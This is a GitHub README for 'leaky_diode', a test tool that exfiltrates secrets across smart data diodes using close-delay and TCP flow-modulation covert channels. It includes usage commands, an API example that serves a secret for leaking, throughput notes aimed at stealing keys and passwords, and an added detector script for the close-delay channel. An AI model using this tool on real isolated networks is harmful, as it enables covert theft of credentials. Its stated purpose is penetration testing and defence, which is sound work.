secnot / leaky_diode

Leaky diode is a data exfiltration test tool for data diodes.

License: GNU Affero General Public License v3.0

Python 100.00%
data diodes exfiltration pentesting cybersecurity

Leaky Diodes

Leaky diode is a data exfiltration test tool for smart data diodes, that is, data diodes that support TCP pass-through with the help of some side channel from the isolated side. The attacks used are flow modulation and/or close delay:

  • CLOSE DELAY uses the delay between the request for one of the secret's bits and the time the server closes the connection to encode the bit value (e.g. a 10-second delay means a 0, a 30-second delay a 1).

  • FLOW MODULATION uses the TCP flow control mechanism to encode the secret's bits as a transfer speed. For example, if the bit requested by the client is 1 the server throttles the speed to 300KB/s, if it's 0 to 100KB/s. The advantage of this attack is that using a single connection makes it harder to detect.

Installation

Download the package or clone the repository, and then install with:

python3 setup.py install

or use PyPI:

pip3 install leaky_diode --user

or

sudo pip3 install leaky_diode

If not installed as root, the path to the scripts will be:

/home/[username]/.local/bin/leaky_client
/home/[username]/.local/bin/leaky_server

Usage

On the isolated side launch the server:

leaky_server public_ip port 'secret string that needs leaking'

On the untrusted side launch the client and select one of the attacks:

leaky_client server_ip server_port --mode flow --partial

or

leaky_client server_ip server_port --mode close --partial

Then wait a few minutes to receive the first byte (it's the slowest). If you're not sure whether it's working, add the --verbose option so it prints a message for each received bit.

Options

usage: leaky_client [-h] [--mode mode] [--low_delay delay] [--high_delay delay] [--low_rate rate]
                    [--high_rate rate] [--sample_time time] [--settle_time time] [--partial]
                    host port

Leaky Diode is a data exfiltration test tool for data diodes

positional arguments:
  host                  Remore host address
  port                  Remote host port

optional arguments:
  -h, --help            Show this help message and exit
  --mode mode, -m mode  Attack mode 'flow' or 'close' (default: flow)
  --low_delay delay     Close delay for low bits (default: 5s) (only Close Mode)
  --high_delay delay    Close delay for high bits (default: 10s) (only Close Mode)
  --low_rate rate       Tx rate for low bits (default: 64 KB/s) (only Flow Mode)
  --high_rate rate      Tx rate for high bits (default: 300 KB/s) (only Flow Mode)
  --sample_time time    Tx rate sampling interval (default: 3.0s) (only Flow Mode)
  --settle_time time    Settle time between sending a bit request and the start of 
                        sampling (default: 8.0s) (only Flow Mode)
  --partial             Show partial results each time another byte from the secret is received
  --verbose             Show debugging messages

usage: leaky_server [-h] host port secret_string

Leaky Diode is a data exfiltration test tool for data diodes

positional arguments:
  host           Remore host address
  port           Remote host port
  secret_string  Attack mode 'flow' or 'close' (default: a secret string)

optional arguments:
  -h, --help     Show this help message and exit
  -v, --verbose  Show debugging messages

Performance

The attack throughput with the default parameters is around 1 B/min (yes, one byte per minute). You can increase it by lowering the delay times in close delay mode, and the settle/sample times in flow modulation mode (the default values are very conservative).

An actual exfiltration attempt using this attack could easily leak a few KB per day: too slow for large breaches, but enough for targeted attacks on keys/passwords or selected users' data.
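A defender-side check for the close delay channel, as an added example that is not part of the leaky_diode project. It assumes each bit request is a separate connection whose lifetime approximates the close delay, and it runs on constructed flow records; the function names, addresses and thresholds are illustrative.

```python
from collections import defaultdict
from statistics import mean

def split_at_largest_gap(durations):
    """Split 1-D samples into two clusters at the widest gap between neighbours."""
    xs = sorted(durations)
    gap, i = max((xs[k + 1] - xs[k], k) for k in range(len(xs) - 1))
    return xs[:i + 1], xs[i + 1:], gap

def close_delay_suspects(records, min_conns=16, max_spread=1.0, min_share=0.2):
    """records: iterable of (client, server, duration_seconds).
    Flags pairs whose connection lifetimes form two tight, well separated
    clusters, the pattern a two-valued close delay produces."""
    by_pair = defaultdict(list)
    for client, server, duration in records:
        by_pair[(client, server)].append(duration)
    suspects = {}
    for pair, durations in by_pair.items():
        if len(durations) < max(min_conns, 2):
            continue  # too few connections to judge
        low, high, gap = split_at_largest_gap(durations)
        tight = low[-1] - low[0] <= max_spread and high[-1] - high[0] <= max_spread
        balanced = min(len(low), len(high)) >= min_share * len(durations)
        if tight and balanced and gap > 2 * max_spread:
            suspects[pair] = (round(mean(low), 1), round(mean(high), 1))
    return suspects

def constructed_sample():
    """Constructed flow records (not captured traffic); addresses are made up."""
    bits = "0100100001101001"  # arbitrary 16-bit pattern
    # Lifetimes near the tool's default close delays (5 s low, 10 s high) plus jitter.
    leak = [("10.0.0.5", "10.1.0.9", (10.0 if b == "1" else 5.0) + 0.05 * (i % 5))
            for i, b in enumerate(bits)]
    # Fixed-interval polling: one tight cluster only, so no second mode.
    polling = [("10.0.0.7", "10.1.0.9", 30.0 + 0.02 * (i % 4)) for i in range(16)]
    # Ordinary mixed traffic: lifetimes spread widely.
    mixed = [("10.0.0.8", "10.1.0.9", d) for d in
             (0.3, 1.2, 4.8, 0.9, 12.5, 2.2, 7.1, 0.4,
              3.3, 25.0, 1.1, 6.0, 0.7, 9.4, 2.9, 15.2)]
    return leak + polling + mixed

if __name__ == "__main__":
    for pair, (low, high) in close_delay_suspects(constructed_sample()).items():
        print(pair, "two-valued close delay near", low, "s and", high, "s")
```

Only the pair with the bimodal lifetimes is reported; the thresholds need tuning to the diode's normal traffic before use on real flow logs.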

API

It is also possible to use leaky_diode as a package and include a server in your own app:

  • class LeakyServer(host, port, secret, ticks=100, max_connections=10)

    • host: (str) Listen interface IP address ('' for all)

    • port: (int) Listen port

    • secret: (bytes) Secret to leak (max length 65535)

    • ticks: (int) Ticks per second the worker processes use to throttle the connections.

    • max_connections: (int) Max concurrent connections the server can handle.

    • start(): Initialize and launch server worker processes

    • stop(): Stop server and its workers

from leaky_diode import LeakyServer

# Listen on one interface and serve the secret to connecting clients
leaky_server = LeakyServer('192.168.0.10', 9000, b'some secret byte string')
leaky_server.start()

# Do something else
# ...

# Stop the server and its workers before exit
leaky_server.stop()

TODO

  • Harden message parsing input validation (invalid lengths)
  • Use concurrent connection to increase exfiltration speed.
  • Tune flow modulation mode tx speeds.
  • Tune close delay mode delays.
  • Add CRC to the secret and secret length, or even better error correction.
  • Add resume capability so there is no need to get the secret in one go.
  • Add some tests.

References

  • Data Diodes Wikipedia
  • Place holder so I remember to publish a post on the attacks
  • And another on transport and streaming protocols for data diodes
